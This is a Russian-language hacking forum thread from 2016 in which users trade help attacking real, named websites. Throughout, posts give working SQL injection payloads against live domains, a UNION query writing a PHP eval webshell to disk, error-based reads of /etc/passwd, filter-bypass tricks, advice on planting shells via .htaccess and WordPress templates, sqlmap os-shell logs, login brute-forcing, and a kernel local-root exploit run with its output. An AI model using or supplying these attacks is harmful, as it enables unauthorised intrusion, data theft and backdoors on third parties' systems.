кстати можно заодно и шелл в .htaccess запилить /threads/298338/ (https://antichat.live/threads/298338/)

PulsarEX547
30.01.2016, 00:31
Нашел sqli на сайте - (post method)

1) подобрал количество столбцов -24, запрос отработал, ошибка пропала, все вроде как норм.

webcastID=' order by 24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion

2) даю второй запрос на колонки, снова появляется ошибка, и выводимой колонки так и нет(

webcastID=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion

Как так, и что делать дальше?

PulsarEX547
30.01.2016, 00:44
MDen1s said:
↑ (https://antichat.live/posts/3945801/)
Пожалуйста,помогите найти таблицу пользователей просмотрел все, но найти почему-то не смог (
http://som.adzu.edu.ph/newsupdates/...5,6 from information_schema.tables limit 97,1 (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,unhex%28hex%28table_name%29 %29,3,database%28%29,5,6%20from%20information_sche ma.tables%20limit%2097,1)


ты что все это руками перебирал через лимит? Так уже никто не делает)

http://som.adzu.edu.ph/newsupdates/index.php?id=-1 union select 1,(select(@x)from(select(@x:=0x00),(select(0)from( information_schema.columns)where(table_schema!=0x6 96e666f726d6174696f6e5f736368656d61)and(0x00)in(@x :=concat(@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name))))x),3,4,5,6-- - (http://som.adzu.edu.ph/newsupdates/index.php?id=-1%20union%20select%201,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%280%29from%28informati on_schema.columns%29where%28table_schema!=0x696e66 6f726d6174696f6e5f736368656d61%29and%280x00%29in%2 8@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tabl e_name,0x3a,column_name%29%29%29%29x%29,3,4,5,6--%20-)

все базы.таблицы:колонки смотри что надо в удобоваримом виде.

-1 /*!50000union*/+/*!50000sElect*/ 1,file_priv,3,4,5,6 from mysql.users-- -

SELECT command denied to user 'som'@'localhost' for table 'users'

странно почему SELECT не получилось провести, или ту дело не в фильтре?....

BabaDook
30.01.2016, 01:03
PulsarEX547 said:
↑ (https://antichat.live/posts/3946732/)
Нашел sqli на сайте - (post method)
1) подобрал количество столбцов -24, запрос отработал, ошибка пропала, все вроде как норм.
webcastID=' order by 24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion
2) даю второй запрос на колонки, снова появляется ошибка, и выводимой колонки так и нет(
webcastID=' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24-- -&username=sdfsdf&password=sdfsdfsd&terms=true&submit=LOG+IN+NOW&submitted=true&FlVer=20%2C0%2C0%2C286&jvaVer=1%2C8%2C0%2C60&ihatespam=withapassion
Как так, и что делать дальше?


какая ошибка, возможно еррор вектор

PulsarEX547
30.01.2016, 01:30
BabaDook said:
↑ (https://antichat.live/posts/3946743/)
какая ошибка, возможно еррор вектор


я дам сайт, мне просто из спортивного интереса так сказать)

www.standrewsclubav.ca (http://www.standrewsclubav.ca)

дальше я думаю разберетесь)

BabaDook
30.01.2016, 02:55
PulsarEX547 said:
↑ (https://antichat.live/posts/3946762/)
я дам сайт, мне просто из спортивного интереса так сказать)
www.standrewsclubav.ca (http://www.standrewsclubav.ca)
дальше я думаю разберетесь)


Хз где вы та уязвимость нашли )) максимум раскрытие пути

Br@!ns
30.01.2016, 11:18
BabaDook said:
↑ (https://antichat.live/posts/3946794/)
Хз где вы та уязвимость нашли )) максимум раскрытие пути


есть там скуля, только крутится блиндом

PulsarEX547
30.01.2016, 12:26
Br@!ns said:
↑ (https://antichat.live/posts/3946886/)
есть там скуля, только крутится блиндом


Это я знаю что есть) меня интересует пример запроса, ваншотнуть тут неполучится скорее всего, но хотя бы посмотреть таблицы.... как? Ладно, попробую зайти в Кали, и просканировать через sqlmap.

BabaDook
30.01.2016, 12:47
Br@!ns said:
↑ (https://antichat.live/posts/3946886/)
есть там скуля, только крутится блиндом


ТОЧНО, что-то я туплю.

BabaDook
30.01.2016, 16:44
PulsarEX547 said:
↑ (https://antichat.live/posts/3946903/)
Это я знаю что есть) меня интересует пример запроса, ваншотнуть тут неполучится скорее всего, но хотя бы посмотреть таблицы.... как? Ладно, попробую зайти в Кали, и просканировать через sqlmap.


это слепая, там не будет вывода таблиц, только правда или лож

RWD
30.01.2016, 19:39
подскажите как конвертировать список сайтов в список ip адресов?

blackbox
31.01.2016, 15:20
RWD said:
↑ (https://antichat.live/posts/3947032/)
подскажите как конвертировать список сайтов в список ip адресов?


Первое что приходит в голову - скриптом сделать nslookup к каждому домену.

Filipp
31.01.2016, 20:07
RWD said:
↑ (https://antichat.live/posts/3947032/)
подскажите как конвертировать список сайтов в список ip адресов?


Вот лови, наговнокодил под скорую руку:


Code:
# -*- coding: utf-8 -*-
import urlparse
import socket

file = open('sites.txt')
wordlist = file.readlines()
col = len(wordlist)
file.close()
for i in range(col):
url = wordlist[i]
parsed = urlparse.urlparse(url)
hostname = parsed.hostname
ipaddress = socket.gethostbyname(hostname)
print (ipaddress)

В файл sites.txt кидаешь URL'ы, ложешь рядом со скриптом и пускаешь. В ответ получишь ip'ишники.

RWD
01.02.2016, 19:04
Filipp said:
↑ (https://antichat.live/posts/3947170/)
Вот лови, наговнокодил под скорую руку:

Code:
# -*- coding: utf-8 -*-
import urlparse
import socket

file = open('sites.txt')
wordlist = file.readlines()
col = len(wordlist)
file.close()
for i in range(col):
url = wordlist[i]
parsed = urlparse.urlparse(url)
hostname = parsed.hostname
ipaddress = socket.gethostbyname(hostname)
print (ipaddress)

В файл sites.txt кидаешь URL'ы, ложешь рядом со скриптом и пускаешь. В ответ получишь ip'ишники.


Traceback (most recent call last):

File "", line 5, in

socket.gaierror: [Errno 11001] getaddrinfo failed

вот такая ошибка

Filipp
01.02.2016, 19:40
RWD said:
↑ (https://antichat.live/posts/3947570/)
Traceback (most recent call last):
File "", line 5, in
socket.gaierror: [Errno 11001] getaddrinfo failed
вот такая ошибка


Хз, я писал под линуксом, все работало. С виртуалки на XP'е проверил, тоже работает. Возможно старая версия python. Я писал под 2.7, скачай нужную версию, последняя 2.7.11.

faza02
01.02.2016, 21:05
это из-за того, что адреса не существует. добавьте try except

t0ma5
02.02.2016, 21:38
хай, есть boolean-based blind

при использовании сравнения, то есть

ord(substr(version(),1,1)) > 51

запрос падает

ord(substr(version(),1,1)) = 53

отрабатывает нормально

сам вопрос, в sqlmap'е искал опцию строго сравнения, чтобы он использовал только = вместо >

не в курсе есть такая опция вообще в природе?

BlitzXX
02.02.2016, 22:17
SELECT `autor`,`title` FROM dle_post WHERE xfields LIKE '%SQL%'



Попробовал так:

SELECT `autor`,`title` FROM dle_post WHERE xfields LIKE '%' AND UNION SELECT * FROM dle_users WHERE 1%'

Как использовать ? Не очень разбираюсь в sql'e

winstrool
02.02.2016, 23:11
SELECT `autor`,`title` FROM dle_post WHERE xfields LIKE '%123%' AND UNION SELECT user(),version() FROM information_schema.tables -- %'

/threads/43966/ (https://antichat.live/threads/43966/) - Учитесь разбираться

t0ma5
03.02.2016, 14:06
t0ma5 said:
↑ (https://antichat.live/posts/3948041/)
хай, есть boolean-based blind
при использовании сравнения, то есть
ord(substr(version(),1,1)) > 51
запрос падает
ord(substr(version(),1,1)) = 53
отрабатывает нормально
сам вопрос, в sqlmap'е искал опцию строго сравнения, чтобы он использовал только = вместо >
не в курсе есть такая опция вообще в природе?


утро вечера мудренее)

нашел опцию

--tamper=between

в этом случае sqlmap использует between сравнение вместо

Улыбайся
04.02.2016, 23:01
В исходном коде страницы, есть такие строки:

30

50

Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.

BurpSuite, TamperData?

faza02
05.02.2016, 00:14
Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


конкретнее опишите, что вы хотите

BabaDook
05.02.2016, 00:43
Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


Да , можно.Нет, не бурп сют

private_static
05.02.2016, 03:46
Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


ну так откройте отладчик браузера и поменяйте аргумент на 50

далее по событию onclick вызовется change(50)

winstrool
05.02.2016, 11:06
Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


Через Firebug

Улыбайся
06.02.2016, 00:16
private_static said:
↑ (https://antichat.live/posts/3948990/)
ну так откройте отладчик браузера и поменяйте аргумент на 50
далее по событию onclick вызовется change(50)


Попробовал. Не всё так просто. Фокус с подменой не удался.

BabaDook
06.02.2016, 00:52
Улыбайся said:
↑ (https://antichat.live/posts/3949317/)
Попробовал. Не всё так просто. Фокус с подменой не удался.


так бля, это локально будет, только для вас и вашего локального веб сервера.

private_static
06.02.2016, 01:12
Улыбайся said:
↑ (https://antichat.live/posts/3949317/)
Попробовал. Не всё так просто. Фокус с подменой не удался.


что именно не удалось?

если в change() не отправляется никаких запросов на сервер с проверками то функция должна отрабатывать спокойно

webworm
06.02.2016, 02:04
WebDAV remote code execution

Ya tak ponimay cheres headers PUT sozdaetsya file i dannie tuda pishutsya uje sledueshem zaprosom PUT ? Nujnni primeri

Sait na asp , proshu pomoshi

P.S. mogu sozdat' cherez PUT file , s razresheniem .jog i .txt , asp i .asp;.jpg ne razreshaet

Ruslan1993it
06.02.2016, 07:43
Улыбайся said:
↑ (https://antichat.live/posts/3948899/)
В исходном коде страницы, есть такие строки:
30
50
Можно ли как то поменять значение 38 или 39, на значение 50, зная что оно такое есть, но тут не отображено.
BurpSuite, TamperData?


Кури Wpe pro, копай в сторону charles

Улыбайся
06.02.2016, 09:13
Ruslan1993it said:
↑ (https://antichat.live/posts/3949396/)
Кури Wpe pro, копай в сторону charles


Burp Suite это не может делать?

faza02
06.02.2016, 13:06
это же все снифферы, почему он должен не позволять?

BlitzXX
06.02.2016, 16:57
Запрос: alert(); > Ответ : alert();

Что возможно сделать при таком фильтре ?

Ruslan1993it
06.02.2016, 17:51
Улыбайся said:
↑ (https://antichat.live/posts/3949399/)
Burp Suite это не может делать?


Может, все от тебя зависит, насколько ты этого хочешь, no system is safe!

Улыбайся
07.02.2016, 02:25
Хочу залить шелл, нужно знать путь куда залить.

есть доступ к phpinfo ()

там можно узнать необходимый мне путь?

Konqi
07.02.2016, 02:35
Улыбайся said:
↑ (https://antichat.live/posts/3949737/)
Хочу залить шелл, нужно знать путь куда залить.
есть доступ к phpinfo ()
там можно узнать необходимый мне путь?


Директива "DOCUMENT_ROOT", показывает корневой каталог сайта.

Улыбайся
07.02.2016, 02:47
robot.txt

User-Agent: *

Disallow: /public_html/Manage~/

Disallow: /public_html/test/

Disallow: /public_html/config.php

Allow: /

Allow: /public_html/

DOCUMENT_ROOT /home/bomarbg/public_html

[01:45:05] [INFO] the back-end DBMS is MySQL

web server operating system: Linux CentOS 6.5

web application technology: PHP 5.3.3, Apache 2.2.15

back-end DBMS: MySQL 5.0

[01:45:05] [INFO] going to use a web backdoor for command prompt

[01:45:05] [INFO] fingerprinting the back-end DBMS operating system

[01:45:05] [INFO] the back-end DBMS operating system is Linux

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

[01:45:06] [WARNING] unable to retrieve automatically the web server document root

what do you want to use for writable directory?

[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 2

please provide a comma separate list of absolute directory paths: /home/bomarbg/public_html

[01:45:10] [WARNING] unable to automatically parse any web server path

[01:45:10] [INFO] trying to upload the file stager on '/home/bomarbg/public_html/' via LIMIT 'LINES TERMINATED BY' method

[01:45:12] [WARNING] unable to upload the file stager on '/home/bomarbg/public_html/'

[01:45:12] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 4 times

[01:45:12] [INFO] fetched data logged to text files under 'C:\Users\.sqlmap\output\'

shutting down at 01:45:12


Konqi said:
↑ (https://antichat.live/posts/3949739/)
Директива "DOCUMENT_ROOT", показывает корневой каталог сайта.



magic_quotes_gpc Off

current user is DBA: True

Могу посмотреть и выводит --users --passwords --privileges --roles --threads=10

blackbox
07.02.2016, 11:53
Улыбайся said:
↑ (https://antichat.live/posts/3949744/)
[01:45:12] [WARNING] unable to upload the file stager on '/home/bomarbg/public_html/'


Прав на запись мб нету?

Улыбайся
07.02.2016, 11:59
blackbox said:
↑ (https://antichat.live/posts/3949826/)
Прав на запись мб нету?


Как проверить через sqlmap

Saint-Sky
07.02.2016, 12:46
Улыбайся said:
↑ (https://antichat.live/posts/3949829/)
Как проверить через sqlmap


Попробуй сначала прочитать какой-нить файл - тогда узнаешь есть ли права у пользователя мускула на чтение... Еще заюзай опцию --privileges .

Если файл прочитается, то видать нет прав на запись в корень. Если движок известный, то пробуй стандартные пути аплоада от корня, например /home/bomarbg/public_html/uploads.

Обязательно попробуй /home/bomarbg/public_html/test - он прописан в роботс, наверняка имеется такая дира...

Пробуй всякие /images, /temp, /old, /download и т.п.

P.S. Правда я не понял - через что ты хочешь залиться? Раз используешь sqlmap, то я так понял, что имеется SQLInj - или ты просто посмотрел инфу о сервере?

Улыбайся
07.02.2016, 13:08
Saint-Sky said:
↑ (https://antichat.live/posts/3949840/)
Попробуй сначала прочитать какой-нить файл - тогда узнаешь есть ли права у пользователя мускула на чтение... Еще заюзай опцию --privileges .
Если файл прочитается, то видать нет прав на запись в корень. Если движок известный, то пробуй стандартные пути аплоада от корня, например /home/bomarbg/public_html/uploads.
Обязательно попробуй /home/bomarbg/public_html/test - он прописан в роботс, наверняка имеется такая дира...
Пробуй всякие /images, /temp, /old, /download и т.п.
P.S. Правда я не понял - через что ты хочешь залиться? Раз используешь sqlmap, то я так понял, что имеется SQLInj - или ты просто посмотрел инфу о сервере?


Я хочу залить shell

current user: 'auto12s786@localhost'

database management system users privileges:

%auto12s786% (administrator) [12]:

privilege: CREATE USER

privilege: INSERT

privilege: LOCK TABLES

privilege: PROCESS

privilege: REFERENCES

privilege: RELOAD

privilege: REPLICATION CLIENT

privilege: REPLICATION SLAVE

privilege: SELECT

privilege: SHOW DATABASES

privilege: SHUTDOWN

privilege: SUPER

winstrool
07.02.2016, 13:12
Улыбайся said:
↑ (https://antichat.live/posts/3949845/)
Я хочу залить shell
current user:
'auto12s786@localhost'
database management system users privileges:

%auto12s786%
(administrator) [12]:
privilege: CREATE USER
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHUTDOWN
privilege: SUPER


Файловых привилегий нет!

Улыбайся
07.02.2016, 14:03
winstrool said:
↑ (https://antichat.live/posts/3949847/)
Файловых привилегий нет!


тогда когда какой вариант? создать пользователя который сможет? CREATE USER

winstrool
07.02.2016, 14:16
Улыбайся said:
↑ (https://antichat.live/posts/3949862/)
тогда когда какой вариант? создать пользователя который сможет? CREATE USER


Как вариант попробывать вот эту тему:

https://rdot.org/forum/showthread.php?t=741

но это только лишь читалка...

P.S: Читалку тестировали? load_file()

ArmusIAm
07.02.2016, 14:18
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,3,4,5--

Хостер фильтрует "from", чем можно заменить или обойти фильтр?

private_static
07.02.2016, 18:29
ArmusIAm said:
↑ (https://antichat.live/posts/3949878/)
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,3,4,5--
Хостер фильтрует "from", чем можно заменить или обойти фильтр?




Code:
http://www.enec.ru/Index.phtml?Name=News&newsID=-40+union+select+1,2,TABLE_NAME,4,5+fRoM+informatio n_schema.tables

Улыбайся
07.02.2016, 18:49
winstrool said:
↑ (https://antichat.live/posts/3949877/)
Как вариант попробывать вот эту тему:
https://rdot.org/forum/showthread.php?t=741
но это только лишь читалка...
P.S: Читалку тестировали?
load_file()


ок гляну.

Br@!ns
07.02.2016, 21:51
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы

Konqi
08.02.2016, 01:51
Br@!ns said:
↑ (https://antichat.live/posts/3950045/)
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы


темплейты, плагины..

Br@!ns
08.02.2016, 12:37
Konqi said:
↑ (https://antichat.live/posts/3950184/)
темплейты, плагины..


-

само собой там тоже без прав)

OxoTnik
08.02.2016, 12:38
Br@!ns said:
↑ (https://antichat.live/posts/3950294/)
-
само собой там тоже без прав)


Правка .htaccess ?

Установка нового .htaccess в твою папку со своими привилегиями

Saint-Sky
08.02.2016, 12:43
Br@!ns said:
↑ (https://antichat.live/posts/3950045/)
какие варианы залития шелла в вордпресс при штаке на папку /uploads ? все читается как текстовые файлы


Все расширения пробовал?

А то я встречал такие .хтаксес, что все виды .php - читались как текст, а вот .phtml прокатывал...

Br@!ns
08.02.2016, 13:07
OxoTnik said:
↑ (https://antichat.live/posts/3950295/)
Правка .htaccess ?
Установка нового .htaccess в твою папку со своими привилегиями


штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы)

с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает

t0ma5
08.02.2016, 17:34
Br@!ns said:
↑ (https://antichat.live/posts/3950302/)
штака сохраняется как /htaccess, т.е без точки, т.е не работает (гружу через добавление темы)
с расширениями тоже чего то не хочет. shtml шелл так же ничего не показывает


маловероятно но если правила для того что показывать/выполнять были настроены на nginx'е, то имеет смысл пробрутить соседние ip и посмотреть не висит ли там apache, если в апаче такие махинации с правилами не добавлялись, то шелл отработает прямым запрос на апач

----

вспомнил ещё, иногда поднят на сервере https, порой хост конфиг для nginx тоже другой

Улыбайся
08.02.2016, 19:53
Может знает кто, можно в BurpSuite intruder сделать паузы, 10 запросов через 5 минут следующие 10 запросов? На случай если стоит бан, на ввод определенного колличества не правильных комбинаций.

blackbox
08.02.2016, 21:23
Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов - несколько false-positive а на деле опять таки ничего. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?

blackbox
08.02.2016, 21:24
Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов для жумлы - несколько false-positive а на деле опять таки ничего, cmsmap попробовал и получил в ответ кучу ошибок, как всегда. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?

MaxFast
09.02.2016, 02:36
blackbox said:
↑ (https://antichat.live/posts/3950541/)
Посоны, подскажите по поводу джумлы: есть несколько движков - просканил joomscan, ничего не нашел, запустил встроенный в msf сканер плагинов для жумлы - несколько false-positive а на деле опять таки ничего, cmsmap попробовал и получил в ответ кучу ошибок, как всегда. Джумла вообще как-нибудь сейчас хачится кроме подбора пароля администратора (последняя бага с rce не в счет) ?


Уязвимости плагинов, плохие серверные настройки, ненужные скрипты дырявые.

blackbox
09.02.2016, 12:54
MaxFast said:
↑ (https://antichat.live/posts/3950640/)
Уязвимости плагинов, плохие серверные настройки, ненужные скрипты дырявые.


Ну я вот сколько движков на скан пускал, там уявзимых плагинов не было. Такое впечатление что сейчас хостеры контролят эту тему. И вообще эти сканеры выдают что-нибудь годное? Только wpscan пока показал себя с лучшей стороны, все остальное либо работает через пень-колоду либо ничего не находит (привет joomscan).

MaxFast
09.02.2016, 20:32
blackbox said:
↑ (https://antichat.live/posts/3950732/)
Ну я вот сколько движков на скан пускал, там уявзимых плагинов не было. Такое впечатление что сейчас хостеры контролят эту тему. И вообще эти сканеры выдают что-нибудь годное? Только wpscan пока показал себя с лучшей стороны, все остальное либо работает через пень-колоду либо ничего не находит (привет joomscan).


Да, joomscan порой выдаёт что-то полезное. Там последнее обновление базы было хрен знаео когда. Забросили же.

blackbox
10.02.2016, 01:06
MaxFast said:
↑ (https://antichat.live/posts/3950950/)
Да, joomscan порой выдаёт что-то полезное. Там последнее обновление базы было хрен знаео когда. Забросили же.


Мне поэтому и интересно что прошаренные юзают. Вот в своей нише wpscan - отличная тулза, ее и поддерживают до сих пор. А вот у cmsmap задумка масштабная, но реализация НЕ ОЧЕНЬ. Вот и приходится пробовать комбинировать все, но имхо это не совсем то.

kostea
11.02.2016, 22:31
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,'',3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+ (http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,%27%3C?php%20eval($_GET[cmd]);%20?%3E%27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29+INTO+OUTFILE+ %27/var/www/html/platformaonline/template/new/scripturi/shell.php%27+--+)

Что я делаю нетак?

Раскрытие

http://my.moldtelecom.md/scripturi/ajax_login.php?username=

kostea
11.02.2016, 23:03
BabaDook said:
↑ (https://antichat.live/posts/3951787/)
на заливку into dumpfile


Та же ошибка можно бодробнее?

Setrus
12.02.2016, 10:49
kostea said:
↑ (https://antichat.live/posts/3951779/)
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,'',3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 +INTO+OUTFILE+'/var/www/html/platformaonline/template/new/scripturi/shell.php'+--+ (http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,%27%3C?php%20eval($_GET[cmd]);%20?%3E%27,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29+INTO+OUTFILE+ %27/var/www/html/platformaonline/template/new/scripturi/shell.php%27+--+)
Что я делаю нетак?
Раскрытие
http://my.moldtelecom.md/scripturi/ajax_login.php?username=



Нет прав на запись в папку, судя по всему.

kostea
12.02.2016, 13:15
Setrus said:
↑ (https://antichat.live/posts/3951913/)
Нет прав на запись в папку, судя по всему.


Когда нет прав пишет по другому

ghost8
15.02.2016, 00:04
kostea said:
↑ (https://antichat.live/posts/3951950/)
Когда нет прав пишет по другому


Экранирование

kostea
15.02.2016, 04:30
ghost8 said:
↑ (https://antichat.live/posts/3952800/)
Экранирование


Приз в студию

RWD
15.02.2016, 04:49
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

kostea
15.02.2016, 05:12
RWD said:
↑ (https://antichat.live/posts/3952852/)
Если я правильно понял то это просто ошибка и ни о какой sql inj тут речи не идет?
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1


http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=or+1=1+--+

Вы или помогаете или не мусорьте

ghost8
15.02.2016, 09:45
kostea said:
↑ (https://antichat.live/posts/3952847/)
Приз в студию


приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла

Читай конфиги

kostea
15.02.2016, 16:00
ghost8 said:
↑ (https://antichat.live/posts/3952871/)
приза не будет,т.к. экранирование на запись в файл не обойти.Только на чтение файла
Читай конфиги


Пример можно а то читать тоже неполучилось

faza02
15.02.2016, 19:33
kostea said:
↑ (https://antichat.live/posts/3953010/)
Пример можно а то читать тоже неполучилось


hex. прочитайте статью по MySQL injection

ghost8
15.02.2016, 22:56
kostea said:
↑ (https://antichat.live/posts/3953010/)
Пример можно а то читать тоже неполучилось




Code:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd

Octavian
15.02.2016, 23:24
ghost8 said:
↑ (https://antichat.live/posts/3953195/)

Code:
select load_file(0x2f6574632f706173737764); // читаем /etc/passwd



http://my.moldtelecom.md/scripturi/...16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+ (http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=UNION+SELECT+1,load_file(0x2f6574632f7061 73737764),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29+--+)

возврашяет тру но нету вывода

BabaDook
16.02.2016, 13:05
Вектор еррор, вчера тоже тестил

load_file(hex(0x2f6574632f706173737764))

0x2f6574632f706173737764 это /etc/passwd

п.с сам до конца не разобрался

Octavian
16.02.2016, 16:19
Прочитать файл или что то залить я вижу что не как

BabaDook
16.02.2016, 18:46
Octavian said:
↑ (https://antichat.live/posts/3953440/)
Прочитать файл или что то залить я вижу что не как


Читать можно


PHP:
http://my.moldtelecom.md/scripturi/ajax_login.php?username=\&password=%20AND%20(SELECT%208838%20FROM(SELECT%20C OUNT(*),CONCAT((MID((IFNULL(CAST(hex(LOAD_FILE(0x2 f6574632f706173737764))%20AS%20CHAR),0x2020)),55,5 4)),%201,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_S CHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)+--+-

Скажите "Спасибо фазе"

z0mbie866
20.02.2016, 10:47
Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?

Saint-Sky
20.02.2016, 11:33
z0mbie866 said:
↑ (https://antichat.live/posts/3954895/)
Имеется Directory traversal (Не LFI) на windows. Файлы типа SAM прочитать нет возможности. Помимо этого имеется apache на другом порту. Как можно найти полный путь до этого апача или как можно получить доступ к самому серверу?


Никак. Данной уязвимости(за исключением крайне редких случаев) типа "Directory traversal" недостаточно для проникновения - надо копнуть глубже...

Пути апача по дефолту в винде гуглятся, а не по дефолту - никак не узнаешь без читалки...

z0mbie866
20.02.2016, 13:35
Имеется cms написанная на node.js, есть возможность заливать файлы. Но web сервер nodejs не позволяет запускать скрипты, можно ли их выполнить?

RWD
21.02.2016, 17:10
столкнулся с проблемой

рутать пытаюсь сплоитом CVE-2013-2094 Linux 2.6.32/2.6.37 - 3.8.10 PERF_EVENTS local root x86/x86_64

Linux 2.6.34.7-56.40.x86_64 #1 SMP Fri Oct 22 18:48:49 UTC 2010 x86_64 x86_64 x86_64 GNU/Linux

Compiling exp_abacus.c...OK.

[+] Resolved set_fs_root to 0xffffffff810e8af8

[+] Resolved set_fs_pwd to 0xffffffff810e8a96

[+] Resolved __virt_addr_valid to 0xffffffff8102a87c

[+] Resolved init_task to 0xffffffff816c9020

[+] Resolved init_fs to 0xffffffff816d9900

[+] Resolved default_exec_domain to 0xffffffff816d0660

[+] Resolved bad_file_ops to 0xffffffff81412da0

[+] Resolved bad_file_aio_read to 0xffffffff810dd407

[+] Resolved selinux_enforcing to 0xffffffff8194b968

[+] Resolved selinux_enabled to 0xffffffff8194b964

[+] Resolved security_ops to 0xffffffff8194a110

[+] Resolved default_security_ops to 0xffffffff816dc0b0

[+] Resolved sel_read_enforce to 0xffffffff81134709

[+] Resolved audit_enabled to 0xffffffff81909414

[+] Resolved commit_creds to 0xffffffff81057c93

[+] Resolved prepare_kernel_cred to 0xffffffff81057b8a

[+] Resolved xen_start_info to 0xffffffff81886308

[+] Resolved ptmx_fops to 0xffffffff819564e0

[+] Resolved mark_rodata_ro to 0xffffffff81026458

[+] Resolved set_kernel_text_ro to 0xffffffff81026421

[+] Resolved make_lowmem_page_readonly to 0xffffffff81004fdf

[+] Resolved make_lowmem_page_readwrite to 0xffffffff81004f1b

[-] System rejected creation of perf event.

plus Linux 3.2.0-4-amd64 #1 SMP Debian 3.2.65-1+deb7u1 x86_64

Compiling exp_abacus.c...OK.

[+] Resolved set_fs_root to 0xffffffff8111cf7b

[+] Resolved set_fs_pwd to 0xffffffff8111cfda

[+] Resolved __virt_addr_valid to 0xffffffff81030c84

[+] Resolved init_task to 0xffffffff8160d020 (via System.map)

[+] Resolved init_fs to 0xffffffff8162dd20 (via System.map)

[+] Resolved default_exec_domain to 0xffffffff81617610 (via System.map)

[+] Resolved bad_file_ops to 0xffffffff81412cc0 (via System.map)

[+] Resolved bad_file_aio_read to 0xffffffff8110f030

[+] Resolved selinux_enforcing to 0xffffffff817ecbb8 (via System.map)

[+] Resolved selinux_enabled to 0xffffffff81634640 (via System.map)

[+] Resolved apparmor_enabled to 0xffffffff81635b8c (via System.map)

[+] Resolved security_ops to 0xffffffff817eb370 (via System.map)

[+] Resolved default_security_ops to 0xffffffff81630ae0 (via System.map)

[+] Resolved sel_read_enforce to 0xffffffff8116cd0f

[+] Resolved audit_enabled to 0xffffffff817b217c (via System.map)

[+] Resolved commit_creds to 0xffffffff8106439e

